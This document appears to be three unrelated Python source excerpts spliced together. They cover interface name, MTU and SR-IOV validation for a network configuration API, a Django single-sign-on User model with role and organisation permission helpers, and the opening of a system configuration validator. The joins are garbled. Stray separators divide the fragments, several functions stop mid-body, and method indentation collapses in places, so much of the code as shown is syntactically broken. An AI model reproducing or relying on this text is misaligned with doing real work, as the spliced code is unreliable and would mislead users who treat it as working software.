    """Validate the interface name: non-blank, lower case, length-limited,
    free of special characters, and unique within the host.

    :param op: "add" or "modify" -- on "add" no existing row is excluded
        from the uniqueness check.
    Raises ClientSideError on any violation; returns the interface dict.
    """
    ihost_id = interface['forihostid']
    ifname = interface['ifname']
    iftype = interface['iftype']
    # Check for ifname that has only spaces
    # NOTE(review): an empty string skips this check but then fails the
    # islower() check below with a misleading message -- confirm intended.
    if ifname and not ifname.strip():
        raise wsme.exc.ClientSideError(_("Interface name cannot be "
                                         "whitespace."))
    # Check that ifname contains only lower case
    if not ifname.islower():
        raise wsme.exc.ClientSideError(_("Interface name must be in "
                                         "lower case."))
    # Check that the ifname is the right character length
    # Account for VLAN interfaces
    iflen = MAX_IFNAME_LEN
    if iftype == constants.INTERFACE_TYPE_VLAN:
        iflen = iflen + MAX_VLAN_ID_LEN
    if ifname and len(ifname) > iflen:
        raise wsme.exc.ClientSideError(_("Interface {} has name length "
                                         "greater than {}.".
                                         format(ifname, iflen)))
    # Check for invalid characters (all punctuation except underscore)
    vlan_id = None
    if iftype == constants.INTERFACE_TYPE_VLAN:
        vlan_id = interface['vlan_id']
    invalidChars = set(string.punctuation.replace("_", ""))
    if vlan_id is not None:
        # Allow VLAN interfaces to have "." in the name
        invalidChars.remove(".")
    if any(char in invalidChars for char in ifname):
        msg = _("Cannot use special characters in interface name.")
        raise wsme.exc.ClientSideError(msg)
    # ifname must be unique within the host
    if op == "add":
        this_interface_id = 0
    else:
        this_interface_id = interface['id']
    interface_list = pecan.request.dbapi.iinterface_get_all(
        forihostid=ihost_id)
    for i in interface_list:
        # Skip the row being modified itself.
        if i.id == this_interface_id:
            continue
        if i.ifname == ifname:
            raise wsme.exc.ClientSideError(_("Interface Name {} must be unique.".format(ifname)))
    return interface
def _check_interface_mtu(interface, ihost, from_profile=False):
    """Validate and normalize the interface MTU.

    Converts imtu to int and delegates range validation to
    utils.validate_mtu(); raises ClientSideError for non-integer input.
    """
    # Check imtu
    if 'imtu' in interface.keys() and interface['imtu'] is not None:
        if not str(interface['imtu']).isdigit():
            raise wsme.exc.ClientSideError(_("MTU is an integer value."))
        interface['imtu'] = int(interface['imtu'])
        utils.validate_mtu(interface['imtu'])
    return interface
def _check_interface_sriov(interface, ihost, from_profile=False):
    """Validate the SR-IOV configuration of an interface.

    Ensures sriov_numvfs/sriov_vf_driver are only given for the pci-sriov
    interface class, that the VF count is a positive integer within the
    underlying port's sriov_totalvfs limit, and that the port has a valid
    driver.

    :returns: True when a runtime SR-IOV config update is required,
        False otherwise.
    :raises wsme.exc.ClientSideError: on any validation failure.
    """
    sriov_update = False
    if 'ifclass' in interface.keys() and not interface['ifclass']:
        return sriov_update
    if (interface['ifclass'] == constants.INTERFACE_CLASS_PCI_SRIOV and
            'sriov_numvfs' not in interface.keys()):
        raise wsme.exc.ClientSideError(_("A network type of pci-sriov must specify "
                                         "a number for SR-IOV VFs."))
    if ('sriov_numvfs' in interface.keys() and interface['sriov_numvfs']
            is not None and int(interface['sriov_numvfs']) > 0 and
            ('ifclass' not in interface.keys() or
             interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV)):
        raise wsme.exc.ClientSideError(_("Number of SR-IOV VFs is specified "
                                         "but interface class is not "
                                         "pci-sriov."))
    if ('sriov_vf_driver' in interface.keys() and interface['sriov_vf_driver']
            is not None and
            ('ifclass' not in interface.keys() or
             interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV)):
        raise wsme.exc.ClientSideError(_("SR-IOV VF driver is specified "
                                         "but interface class is not "
                                         "pci-sriov."))
    if ('ifclass' in interface.keys() and
            interface['ifclass'] == constants.INTERFACE_CLASS_PCI_SRIOV and
            'sriov_numvfs' in interface.keys()):
        if interface['sriov_numvfs'] is None:
            raise wsme.exc.ClientSideError(_("Value for number of SR-IOV VFs must be specified."))
        if not str(interface['sriov_numvfs']).isdigit():
            raise wsme.exc.ClientSideError(_("Value for number of SR-IOV VFs is an integer value."))
        # Convert before comparing: REST patch values arrive as strings and
        # a str<=int comparison raises TypeError under Python 3.
        if int(interface['sriov_numvfs']) <= 0:
            raise wsme.exc.ClientSideError(_("Value for number of SR-IOV VFs must be > 0."))
        if interface['sriov_vf_driver'] is not None:
            if interface['sriov_vf_driver'] not in constants.SRIOV_DRIVER_TYPES:
                msg = (_("Value for SR-IOV VF driver must be one of "
                         "{}").format(', '.join(constants.SRIOV_DRIVER_TYPES)))
                raise wsme.exc.ClientSideError(msg)
        if interface['iftype'] == constants.INTERFACE_TYPE_ETHERNET:
            ports = pecan.request.dbapi.ethernet_port_get_all(hostid=ihost['id'])
            # Collect (name, sriov_totalvfs, driver) of the port(s) wired
            # to this interface; exactly one is expected for ethernet.
            port_list = [
                (p.name, p.sriov_totalvfs, p.driver) for p in ports
                if p.interface_id and p.interface_id == interface['id']
            ]
            if len(port_list) != 1:
                raise wsme.exc.ClientSideError(_("Exactly one port must be enabled."))
            sriov_totalvfs = port_list[0][1]
            if sriov_totalvfs is None or sriov_totalvfs == 0:
                raise wsme.exc.ClientSideError(_("SR-IOV can't be configured on this interface"))
            if int(interface['sriov_numvfs']) > sriov_totalvfs:
                # Format outside _() so the translation catalog key is the
                # unformatted template.
                raise wsme.exc.ClientSideError(
                    _("The interface support a maximum of %s VFs") % sriov_totalvfs)
            driver = port_list[0][2]
            if not driver:
                raise wsme.exc.ClientSideError(_("Corresponding port has invalid driver"))
        sriov_update = True
    return sriov_update
def _check_host(ihost):
    # Interface changes are only permitted on administratively locked hosts.
    if ihost['administrative'] != constants.ADMIN_LOCKED:
        raise wsme.exc.ClientSideError(_("Host must be locked."))
def _check_interface_class_and_host_type(ihost, interface):
    # The 'data' interface class requires the host to have the worker
    # subfunction (e.g. worker or AIO-controller nodes).
    if (interface['ifclass'] == constants.INTERFACE_CLASS_DATA and
            constants.WORKER not in ihost['subfunctions']):
        msg = _("The data interface class is only supported on nodes "
                "supporting worker functions")
        raise wsme.exc.ClientSideError(msg)
def _check_interface_class_and_type(interface):
    # PCI interface classes (e.g. pci-sriov/pci-passthrough) may only be
    # applied to ethernet or VF interface types.
    if (interface['ifclass'] in PCI_INTERFACE_CLASS and
            interface['iftype'] not in [constants.INTERFACE_TYPE_ETHERNET,
                                        constants.INTERFACE_TYPE_VF]):
        msg = (_("The {} interface class is only valid on Ethernet and "
                 "VF interfaces").format(', '.join(PCI_INTERFACE_CLASS)))
        raise wsme.exc.ClientSideError(msg)
def _check_interface_class_transition(interface, existing_interface):
if not existing_interface:
return
ifclass = interface['ifclass']
existing_ifclass = existing_interface['ifclass']
if ifclass == existing_ifclass:
return
# to share single vf capable nic, we need to | |
# Source repository: g10f/sso
import datetime
import logging
import uuid
from sorl import thumbnail
from current_user.models import CurrentUserField
from django.conf import settings
from django.contrib.auth.models import Permission, PermissionsMixin, AbstractBaseUser, BaseUserManager
from django.contrib.auth.validators import UnicodeUsernameValidator
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.db.models import Q
from django.db.utils import IntegrityError
from django.utils import timezone
from django.utils.encoding import force_str
from django.utils.translation import gettext_lazy as _
from sso.access_requests.models import AccessRequest
from sso.accounts.models import OrganisationChange
from sso.accounts.models.application import ApplicationRole, RoleProfile, Application, Role, get_applicationrole_ids
from sso.accounts.models.user_data import UserEmail, Membership
from sso.decorators import memoize
from sso.emails.models import GroupEmailManager
from sso.models import ensure_single_primary, get_filename
from sso.organisations.models import AdminRegion, Organisation, OrganisationCountry, Association
from sso.registration.models import RegistrationProfile
from sso.signals import default_roles
from sso.utils.email import send_mail
logger = logging.getLogger(__name__)
class UserManager(BaseUserManager):
    """Manager for the custom SSO User model."""

    def _create_user(self, username, password,
                     is_staff, is_superuser, **extra_fields):
        """
        Creates and saves a User with the given username and password.
        """
        now = timezone.now()
        if not username:
            raise ValueError('The given username must be set')
        user = self.model(username=username,
                          is_staff=is_staff, is_active=True,
                          is_superuser=is_superuser, last_login=now,
                          date_joined=now, **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user

    @classmethod
    def recovery_expiration_date(cls):
        # The date after deactivated users should be deleted
        return timezone.now() - datetime.timedelta(minutes=settings.SSO_USER_RECOVERY_PERIOD_MINUTES)

    def create_user(self, username, password=None, **extra_fields):
        """Create a regular user; password=None yields an unusable password
        (Django's set_password(None) convention)."""
        return self._create_user(username, password, False, False,
                                 **extra_fields)

    def create_superuser(self, username, password, **extra_fields):
        """Create a user with both staff and superuser flags set."""
        return self._create_user(username, password, True, True,
                                 **extra_fields)

    def get_by_confirmed_or_primary_email(self, email):
        """Return the single user owning this email address, provided the
        address is confirmed or is the user's primary address."""
        q = Q(useremail__email=email) & (Q(useremail__confirmed=True) | Q(useremail__primary=True))
        return self.filter(q).prefetch_related('useremail_set').get()

    def get_by_email(self, email):
        """Return the single user owning this email address (any state)."""
        return self.filter(useremail__email=email).prefetch_related('useremail_set').get()
def generate_filename(instance, filename):
    """Build the upload path for a user picture: image/<user uuid hex>/<name>,
    with the original name sanitized to ASCII."""
    safe_name = get_filename(filename.encode('ascii', 'replace'))
    return 'image/%s/%s' % (instance.uuid.hex, safe_name)
class User(AbstractBaseUser, PermissionsMixin):
    """Custom SSO user: username-based auth plus organisation membership,
    admin scopes (region/country/association), application roles and
    profile data."""
    # Picture constraints come from project settings.
    MAX_PICTURE_SIZE = settings.SSO_USER_MAX_PICTURE_SIZE
    PICTURE_WIDTH = settings.SSO_USER_PICTURE_WIDTH
    PICTURE_HEIGHT = settings.SSO_USER_PICTURE_HEIGHT
    GENDER_CHOICES = [
        ('m', _('male')),
        ('f', _('female'))
    ]
    username_validator = UnicodeUsernameValidator()
    username = models.CharField(_('username'), max_length=70, unique=True,
                                help_text=_('Required. 70 characters or fewer. Letters, digits and @/./+/-/_ only.'),
                                validators=[username_validator], error_messages={
                                    'unique': _("A user with that username already exists."), }, )
    first_name = models.CharField(_('first name'), max_length=30, blank=True)
    last_name = models.CharField(_('last name'), max_length=40, blank=True)
    is_staff = models.BooleanField(_('staff status'), default=False, help_text=_('Designates whether the user can log into this admin site.'))
    is_active = models.BooleanField(_('active'), default=True, db_index=True, help_text=_(
        'Designates whether this user should be treated as active. Unselect this instead of deleting accounts.'))
    date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
    uuid = models.UUIDField(unique=True, default=uuid.uuid4, editable=True)
    # Membership links users to organisations; required-ness is configurable.
    organisations = models.ManyToManyField(Organisation, verbose_name=_('organisations'), through=Membership, blank=(not settings.SSO_ORGANISATION_REQUIRED))
    # User-admin scopes.
    admin_regions = models.ManyToManyField(AdminRegion, verbose_name=_('admin regions'), blank=True)
    admin_organisation_countries = models.ManyToManyField(OrganisationCountry, verbose_name=_('admin countries'), blank=True)
    admin_associations = models.ManyToManyField(Association, verbose_name=_('admin associations'), blank=True)
    # App-admin scopes (separate related_name to distinguish from the above).
    app_admin_regions = models.ManyToManyField(AdminRegion, related_name='app_admin_user', verbose_name=_('app admin regions'), blank=True)
    app_admin_organisation_countries = models.ManyToManyField(OrganisationCountry, related_name='app_admin_user',
                                                              verbose_name=_('app admin countries'), blank=True)
    app_admin_associations = models.ManyToManyField(Association, related_name='app_admin_user', verbose_name=_('app admin associations'), blank=True)
    application_roles = models.ManyToManyField(ApplicationRole, verbose_name=_('application roles'), blank=True)
    role_profiles = models.ManyToManyField(RoleProfile, verbose_name=_('role profiles'), blank=True,
                                           help_text=_('Organises a group of application roles that are usually '
                                                       'assigned together.'))
    last_modified_by_user = CurrentUserField(verbose_name=_('last modified by'), related_name='+', on_delete=models.SET_NULL)
    last_modified = models.DateTimeField(_('last modified'), auto_now=True)
    created_by_user = models.ForeignKey('self', verbose_name=_('created by'), related_name='+', null=True, on_delete=models.SET_NULL)
    is_center = models.BooleanField(_('organisation'), default=False,
                                    help_text=_('Designates that this user is representing a organisation and not a '
                                                'private person.'))
    is_service = models.BooleanField(_('service'), default=False,
                                     help_text=_('Designates that this user is representing a service account and '
                                                 'not a person.'))
    is_subscriber = models.BooleanField(_('subscriber'), default=False, help_text=_('Designates whether this user is a newsletter subscriber.'))
    picture = thumbnail.ImageField(_('picture'), upload_to=generate_filename, blank=True)  # , storage=MediaStorage())
    gender = models.CharField(_('gender'), max_length=255, choices=GENDER_CHOICES, blank=True)
    dob = models.DateField(_("date of birth"), blank=True, null=True)
    homepage = models.URLField(_("homepage"), max_length=512, blank=True)
    language = models.CharField(_('language'), max_length=254, choices=settings.LANGUAGES, blank=True)
    timezone = models.CharField(_('timezone'), blank=True, max_length=254)
    valid_until = models.DateTimeField(_('valid until'), blank=True, null=True)
    last_ip = models.GenericIPAddressField(_('last ip address'), blank=True, null=True)
    is_stored_permanently = models.BooleanField(_('store permanently'), help_text=_('Do not delete, even if inactive'), default=False)
    objects = UserManager()
    USERNAME_FIELD = 'username'

    class Meta(AbstractBaseUser.Meta):
        verbose_name = _('user')
        verbose_name_plural = _('users')
        # Custom permissions used by the SSO admin views.
        permissions = (
            ("read_user", "Can read user data"),
            ("access_all_users", "Can access all users"),
            ("app_admin_access_all_users", "Can access all users as App admin"),
        )
def get_full_name(self):
    """
    Returns the first_name plus the last_name, with a space in between.
    """
    combined = '%s %s' % (self.first_name, self.last_name)
    return combined.strip()
def get_short_name(self):
    """Returns the short name for the user."""
    # Django convention: the short name is just the first name.
    return self.first_name
def email_user(self, subject, message, from_email=None, **kwargs):
    """
    Sends an email to this User.

    Returns the number of messages sent (0 when the user has no
    primary email address; the problem is logged).
    """
    primary = self.primary_email()
    if primary is None:
        logger.error('User %s has no primary_email', self.username)
        return 0
    if from_email is not None:
        from_email = force_str(from_email)
    return send_mail(subject, message, [primary.email],
                     from_email=from_email, **kwargs)
def primary_email(self):
    """Return the user's primary UserEmail, or None if there is none."""
    # Iterate useremail_set.all() so a prefetch_related('useremail_set')
    # cache is reused instead of issuing a filtered query.
    return next((ue for ue in self.useremail_set.all() if ue.primary), None)
def create_primary_email(self, email, confirmed=None, delete_others=False):
    """
    Make email the primary email and all other emails non-primary.
    If the user email does not exist, it is created; the other user
    emails are marked as not primary, or deleted if delete_others=True.
    Returns the (created or updated) primary UserEmail.
    """
    email = UserManager.normalize_email(email)
    user_email = None
    for l_user_email in self.useremail_set.all():
        # Match case-insensitively, but store the normalized casing.
        if email.lower() == l_user_email.email.lower():
            l_user_email.primary = True
            l_user_email.email = email
            if confirmed is not None:
                l_user_email.confirmed = confirmed
            l_user_email.save()
            user_email = l_user_email
        else:
            if delete_others:
                l_user_email.delete()
            else:
                # Demote any other primary address.
                if l_user_email.primary:
                    l_user_email.primary = False
                    l_user_email.save(update_fields=['primary'])
    if not user_email:
        # No existing record matched -- create a fresh primary address.
        kwargs = {'email': email, 'user': self, 'primary': True}
        if confirmed is not None:
            kwargs['confirmed'] = confirmed
        user_email = UserEmail.objects.create(**kwargs)
    return user_email
def confirm_primary_email_if_no_confirmed(self):
    """Mark the primary email as confirmed when the user has no confirmed
    address at all."""
    if not UserEmail.objects.filter(confirmed=True, user=self).exists():
        # no confirmed email addresses for this user, then the password reset
        # must be send to the primary email and we can mark this email as confirmed
        user_email = UserEmail.objects.get(primary=True, user=self)
        # NOTE(review): invariant check only -- assert statements are
        # stripped when Python runs with -O.
        assert (not user_email.confirmed)
        user_email.confirmed = True
        user_email.save(update_fields=['confirmed'])
def ensure_single_primary_email(self):
    # Delegate to the shared helper that enforces exactly one primary
    # entry in a set of primary-flagged objects.
    ensure_single_primary(self.useremail_set.all())
def update_last_modified(self):
    # last_modified is auto_now, so saving with it as the only update
    # field bumps the timestamp without touching other columns.
    self.save(update_fields=['last_modified'])
@memoize
def get_last_modified_deep(self):
    """
    Get the max date of last_modified from the user and the corresponding
    address, phone, email and attribute records, using
    _prefetched_objects_cache if available for performance in api lists.
    """
    related_names = ('useraddress_set', 'userphonenumber_set',
                     'useremail_set', 'userattribute_set')
    last_modified_list = [self.last_modified]
    for related_name in related_names:
        last_modified_list += self._related_last_modified(related_name)
    return max(last_modified_list)

def _related_last_modified(self, related_name):
    """Return the last_modified values of one related set, preferring the
    prefetch_related cache over a fresh values_list() query."""
    manager = getattr(self, related_name)
    if hasattr(self, '_prefetched_objects_cache') and (related_name in self._prefetched_objects_cache):
        # Cached objects: read the attribute without hitting the DB again.
        return [obj.last_modified for obj in manager.all()]
    return list(manager.values_list("last_modified", flat=True))
@classmethod
def get_primary_or_none(cls, queryset):
    """Return the first item flagged primary, or None. Iterating the
    queryset directly reuses any prefetch_related cache."""
    return next((item for item in queryset if item.primary), None)
@classmethod
def get_default_role_profile(cls, role_uuid=None):
    """Return the default member RoleProfile (settings-configured unless a
    uuid is given); falls back to an empty queryset when not found."""
    role_profile = RoleProfile.objects.none()
    if role_uuid is None:
        role_uuid = settings.SSO_DEFAULT_MEMBER_PROFILE_UUID
    if role_uuid:
        try:
            role_profile = RoleProfile.objects.get(uuid=role_uuid)
        except ObjectDoesNotExist:
            # Missing profile is tolerated; caller gets the empty default.
            pass
    return role_profile
@classmethod
def get_default_guest_profile(cls, role_uuid=None):
    """Return the default guest RoleProfile or None.

    NOTE(review): unlike get_default_role_profile this returns None (not
    an empty queryset) when nothing is found -- confirm callers expect it.
    """
    role_profile = None
    if role_uuid is None:
        role_uuid = settings.SSO_DEFAULT_GUEST_PROFILE_UUID
    if role_uuid:
        try:
            role_profile = RoleProfile.objects.get(uuid=role_uuid)
        except ObjectDoesNotExist:
            pass
    return role_profile
@classmethod
def get_default_admin_profile(cls):
    """Return the settings-configured default admin RoleProfile; falls
    back to an empty queryset when unset or not found."""
    role_profile = RoleProfile.objects.none()
    if settings.SSO_DEFAULT_ADMIN_PROFILE_UUID:
        try:
            role_profile = RoleProfile.objects.get(uuid=settings.SSO_DEFAULT_ADMIN_PROFILE_UUID)
        except ObjectDoesNotExist:
            pass
    return role_profile
@property
def primary_address(self):
    # Primary UserAddress or None; uses the prefetch-friendly helper.
    return self.get_primary_or_none(self.useraddress_set.all())
@property
def primary_phone(self):
    # Primary UserPhoneNumber or None; uses the prefetch-friendly helper.
    return self.get_primary_or_none(self.userphonenumber_set.all())
@memoize
def get_apps(self):
    """Return the distinct active Applications reachable through the
    user's application roles, ordered for display."""
    applicationrole_ids = self.get_applicationrole_ids()
    return Application.objects.distinct().filter(applicationrole__in=applicationrole_ids, is_active=True). \
        order_by('order').prefetch_related('applicationrole_set', 'applicationrole_set__role')
def get_global_navigation_urls(self):
    """Return the user's active applications that are flagged for the
    global navigation bar, ordered for display."""
    applicationrole_ids = self.get_applicationrole_ids()
    return Application.objects.distinct().filter(applicationrole__in=applicationrole_ids,
                                                 is_active=True,
                                                 global_navigation=True).order_by('order')
def get_roles_by_app(self, app_uuid):
    """Return the distinct Roles this user holds within one application."""
    applicationrole_ids = self.get_applicationrole_ids()
    return Role.objects.distinct().filter(applicationrole__in=applicationrole_ids,
                                          applicationrole__application__uuid=app_uuid)
def get_group_and_role_permissions(self):
    """
    get all permissions the user has through his groups and roles
    """
    applicationrole_ids = self.get_applicationrole_ids()
    # Permissions come either from groups tied to the user's roles within
    # this SSO application, or from groups assigned to the user directly.
    q = Q(group__role__applicationrole__in=applicationrole_ids,
          group__role__applicationrole__application__uuid=settings.SSO_APP_UUID) | Q(group__user=self)
    return Permission.objects.distinct().filter(q)
@memoize
def get_applicationrole_ids(self):
    # Memoized id set of all application roles (direct and via profiles).
    return get_applicationrole_ids(self.id)
@memoize
def get_applicationroles(self):
    """Return the ApplicationRole objects behind get_applicationrole_ids()."""
    applicationrole_ids = self.get_applicationrole_ids()
    return ApplicationRole.objects.filter(id__in=applicationrole_ids).select_related()
@memoize
def get_administrable_application_roles(self):
    """Queryset of application roles this user is allowed to administer:
    everything for superusers, otherwise the user's own roles restricted
    by the matching inheritable flag."""
    if self.is_superuser:
        return ApplicationRole.objects.all().select_related()
    if self.is_global_user_admin:
        return ApplicationRole.objects.filter(
            id__in=self.get_applicationrole_ids(),
            is_inheritable_by_global_admin=True).select_related()
    if self.is_user_admin:
        return ApplicationRole.objects.filter(
            id__in=self.get_applicationrole_ids(),
            is_inheritable_by_org_admin=True).select_related()
    return ApplicationRole.objects.none()
@memoize
def get_administrable_role_profiles(self):
    """Queryset of role profiles this user may assign: all profiles for
    superusers, otherwise the user's own profiles filtered by the
    matching inheritable flag."""
    if self.is_superuser:
        return RoleProfile.objects.all().prefetch_related('application_roles', 'application_roles__role',
                                                          'application_roles__application')
    else:
        # all role profiles the user has, with adequate inheritable flag
        if self.is_global_user_admin:
            role_profiles = self.role_profiles.filter(is_inheritable_by_global_admin=True)
        elif self.is_user_admin:
            role_profiles = self.role_profiles.filter(is_inheritable_by_org_admin=True)
        else:
            role_profiles = self.role_profiles.none()
        return role_profiles.prefetch_related('application_roles', 'application_roles__role',
                                              'application_roles__application').distinct()
@memoize
def get_administrable_app_admin_application_roles(self):
    """Application roles the user may administer in the app-admin role;
    empty unless the user is an app admin."""
    if not self.is_app_admin():
        return ApplicationRole.objects.none()
    return ApplicationRole.objects.filter(application__applicationadmin__admin=self)
@memoize
def get_administrable_app_admin_role_profiles(self):
    """Role profiles the user may administer as an app admin (those with a
    RoleProfileAdmin entry naming this user)."""
    # all role profiles the user has, with adequate inheritable flag
    role_profiles = self.role_profiles.none()
    if self.is_app_admin():
        role_profiles = RoleProfile.objects.filter(roleprofileadmin__admin=self)
    return role_profiles.prefetch_related('application_roles', 'application_roles__role',
                                          'application_roles__application').distinct()
@memoize
def get_administrable_user_organisations(self):
    """
    return a list of organisations from all the users we have admin rights on
    """
    if self.is_global_user_admin:
        return Organisation.objects.all().select_related('organisation_country__country', 'email', 'association')
    elif self.is_user_admin:
        # Scope: own organisations plus anything covered by the user's
        # admin regions, countries or associations.
        return Organisation.objects.filter(
            Q(pk__in=self.organisations.all()) |
            Q(admin_region__in=self.admin_regions.all()) |
            Q(organisation_country__in=self.admin_organisation_countries.all()) |
            Q(association__in=self.admin_associations.all())) \
            .select_related('organisation_country__country', 'email', 'association').distinct()
    else:
        return Organisation.objects.none()
@memoize
def get_administrable_user_regions(self):
"""
return a list of regions from all the users we have admin rights on
"""
| |
"""
Copyright (c) 2015-2017 Wind River Systems, Inc.
SPDX-License-Identifier: Apache-2.0
"""
from configutilities.common.configobjects import DEFAULT_NAMES
from configutilities.common.configobjects import NETWORK_PREFIX_NAMES
from configutilities.common.configobjects import OAM_TYPE
from configutilities.common.configobjects import MGMT_TYPE
from configutilities.common.configobjects import Network
from configutilities.common.configobjects import REGION_CONFIG
from configutilities.common.configobjects import INFRA_TYPE
from configutilities.common.configobjects import DEFAULT_DOMAIN_NAME
from configutilities.common.configobjects import HP_NAMES
from configutilities.common.configobjects import SUBCLOUD_CONFIG
from configutilities.common.configobjects import CLUSTER_TYPE
from netaddr import IPRange
from configutilities.common.utils import lag_mode_to_str
from configutilities.common.utils import validate_network_str
from configutilities.common.utils import check_network_overlap
from configutilities.common.utils import is_mtu_valid
from configutilities.common.utils import get_service
from configutilities.common.utils import get_optional
from configutilities.common.utils import validate_address_str
from configutilities.common.utils import validate_nameserver_address_str
from configutilities.common.utils import is_valid_url
from configutilities.common.utils import is_valid_domain_or_ip
from configutilities.common.exceptions import ConfigFail
from configutilities.common.exceptions import ValidateFail
# Constants
# Build-time placeholder token substituted with the real software version at
# packaging time; compared against the config file's VERSION/RELEASE option.
TiS_VERSION = "xxxSW_VERSIONxxx"
# Minimum values for partition sizes (units per installer convention,
# presumably GiB — TODO confirm against the installer documentation).
MIN_DATABASE_STORAGE = 20
MIN_IMAGE_STORAGE = 10
MIN_IMAGE_CONVERSIONS_VOLUME = 20
# shadow(5)-style max-days value conventionally used to disable password aging.
WRSROOT_PASSWD_NO_AGING = 99999
# System mode
SYSTEM_MODE_DUPLEX = "duplex"
SYSTEM_MODE_SIMPLEX = "simplex"
SYSTEM_MODE_DUPLEX_DIRECT = "duplex-direct"
# Distributed cloud roles (SYSTEM/DISTRIBUTED_CLOUD_ROLE option values).
DISTRIBUTED_CLOUD_ROLE_SYSTEMCONTROLLER = 'systemcontroller'
DISTRIBUTED_CLOUD_ROLE_SUBCLOUD = 'subcloud'
# System type
SYSTEM_TYPE_AIO = "All-in-one"
SYSTEM_TYPE_STANDARD = "Standard"
class ConfigValidator(object):
def __init__(self, system_config, cgcs_config, config_type, offboard,
             naming_type=DEFAULT_NAMES):
    """
    :param system_config: system configuration
    :param cgcs_config: if not None config data should be returned
    :param config_type: indicates whether it is system, region or subcloud
    config
    :param offboard: if true only perform general error checking
    :param naming_type: naming convention used to look up network section
    and prefix names (DEFAULT_NAMES or HP_NAMES)
    :return:
    """
    self.conf = system_config
    self.cgcs_conf = cgcs_config
    self.config_type = config_type
    self.naming_type = naming_type
    self.offboard = offboard
    # Next free index used when generating "bondN" LAG interface names.
    self.next_lag_index = 0
    # Subnets validated so far; used for inter-network overlap checks.
    self.configured_networks = []
    # VLAN ids seen so far; used for duplicate-VLAN detection.
    self.configured_vlans = []
    self.pxeboot_network_configured = False
    self.pxeboot_section_name = None
    # Interface names, filled in as each network section is validated.
    self.management_interface = None
    self.infrastructure_interface = None
    self.cluster_interface = None
    # Parsed Network objects, one per network type.
    self.mgmt_network = None
    self.infra_network = None
    self.cluster_network = None
    self.oam_network = None
    self.vswitch_type = None
    self.glance_region = None
    # Populated by validate_system() from the [SYSTEM] section.
    self.system_mode = None
    self.system_type = None
    self.system_dc_role = None
def is_simplex_cpe(self):
    """Return True when the configured system mode is simplex."""
    return SYSTEM_MODE_SIMPLEX == self.system_mode
def is_subcloud(self):
    """Return True when the distributed cloud role is 'subcloud'."""
    return DISTRIBUTED_CLOUD_ROLE_SUBCLOUD == self.system_dc_role
def set_system_mode(self, mode):
    """Record the system mode (simplex/duplex/duplex-direct)."""
    self.system_mode = mode
def set_system_dc_role(self, dc_role):
    """Record the distributed cloud role (or None)."""
    self.system_dc_role = dc_role
def set_oam_config(self, use_lag, external_oam_interface_name):
    """Write the validated OAM network settings into the cEXT_OAM section.

    No-op when self.cgcs_conf is None (validation-only mode).

    :param use_lag: True when the OAM logical interface is a LAG bond
    :param external_oam_interface_name: base interface name (a VLAN suffix
        is appended below when the OAM network is on a VLAN)
    """
    if self.cgcs_conf is not None:
        self.cgcs_conf.add_section('cEXT_OAM')
        self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_MTU',
                           self.oam_network.logical_interface.mtu)
        self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_SUBNET',
                           self.oam_network.cidr)
        if use_lag:
            self.cgcs_conf.set('cEXT_OAM', 'LAG_EXTERNAL_OAM_INTERFACE',
                               'yes')
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_BOND_MEMBER_0',
                               self.oam_network.logical_interface.ports[0])
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_BOND_MEMBER_1',
                               self.oam_network.logical_interface.ports[1])
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_BOND_POLICY',
                               lag_mode_to_str(self.oam_network.
                                               logical_interface.lag_mode))
        else:
            self.cgcs_conf.set('cEXT_OAM', 'LAG_EXTERNAL_OAM_INTERFACE',
                               'no')
        self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_INTERFACE',
                           external_oam_interface_name)
        if self.oam_network.vlan:
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_VLAN',
                               str(self.oam_network.vlan))
            # The full interface name carries the VLAN id suffix.
            external_oam_interface_name += '.' + str(self.oam_network.vlan)
        self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_INTERFACE_NAME',
                           external_oam_interface_name)
        if self.oam_network.gateway_address:
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_GATEWAY_ADDRESS',
                               str(self.oam_network.gateway_address))
        if self.system_mode == SYSTEM_MODE_SIMPLEX:
            # Simplex: addresses were parsed directly from the config.
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_FLOATING_ADDRESS',
                               str(self.oam_network.floating_address))
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_0_ADDRESS',
                               str(self.oam_network.address_0))
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_1_ADDRESS',
                               str(self.oam_network.address_1))
        else:
            # Duplex: fall back to consecutive addresses from the start of
            # the configured range when explicit addresses are absent.
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_FLOATING_ADDRESS',
                               str(self.oam_network.floating_address or
                                   self.oam_network.start_address))
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_0_ADDRESS',
                               str(self.oam_network.address_0 or
                                   self.oam_network.start_address + 1))
            self.cgcs_conf.set('cEXT_OAM', 'EXTERNAL_OAM_1_ADDRESS',
                               str(self.oam_network.address_1 or
                                   self.oam_network.start_address + 2))
def process_oam_on_its_own_interface(self):
    """Resolve the OAM interface name when OAM has a dedicated interface.

    Returns a (use_lag, interface_name) tuple. Raises ConfigFail for an
    unsupported LAG mode.
    """
    oam_prefix = NETWORK_PREFIX_NAMES[self.naming_type][OAM_TYPE]
    logical = self.oam_network.logical_interface
    if not logical.lag_interface:
        # OAM on its own non-LAG interface: use the single port directly.
        return False, logical.ports[0]
    # OAM on its own LAG interface: only modes 1, 2 and 4 are supported.
    if logical.lag_mode not in (1, 2, 4):
        raise ConfigFail(
            "Unsupported LAG mode (%d) for %s interface"
            " - use LAG mode 1, 2, or 4 instead" %
            (logical.lag_mode, oam_prefix))
    return True, 'bond' + str(self.next_lag_index)
def validate_oam_common(self):
    """Parse and validate the OAM network section into self.oam_network.

    Simplex systems need only one OAM address; duplex systems need three
    (floating plus one per controller). Parse errors are re-raised as
    ConfigFail.
    """
    self.oam_network = Network()
